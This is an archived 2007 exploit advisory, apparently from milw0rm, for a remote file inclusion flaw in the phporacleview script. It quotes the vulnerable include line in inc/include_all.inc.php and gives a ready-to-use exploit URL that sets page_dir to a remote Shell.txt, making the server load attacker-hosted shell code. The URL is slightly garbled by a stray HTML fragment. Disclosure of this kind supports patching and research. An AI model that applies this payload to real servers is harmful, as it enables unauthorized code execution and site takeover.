Related information

Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

PHP-Ring Webring System 0.9 Remote SQL Injection Vulnerability

Maran PHP Forum (forum_write. php) Remote Code Execution Vulnerability

JChit counter 1.0.0 (imgsrv.php ac) Remote File Disclosure Vulnerability

GPB bulletin board Remote file include

From:	Alkomandoz Hacker <alkomandoz-hacker_(at)_hotmail.com>
Date:	30.04.2007
Subject:	phporacleview => (page_dir) Remote File Inclusion Exploit

===============================
phporacleview =>  (page_dir) Remote File Inclusion Exploit
===============================

Discoverd By : Alkomandoz Hacker


HomePge= Asb-May.Net & Mohandko.com & Sniper-sa.com & Tryag.com

================================

Script Name: phporacleview

Download Script: http://webxadmin.free.fr/download/phporacleview.zip


=================================
Bug in :

phporacleview/inc/include_all.inc.php

=======

<?
include($page_dir . $inc_dir . "config.inc.php");

==================================


Exploit :
--------------------------------

http://localhost/phporacleview/inc/include_all.inc.php?page_dir=lass="fixed">http://Shell.txt?

===================================

GreetZ : AsbMay's Groups & City Of Ghosts Team & Sniper-sa TeAm

# milw0rm.com [2007-04-26]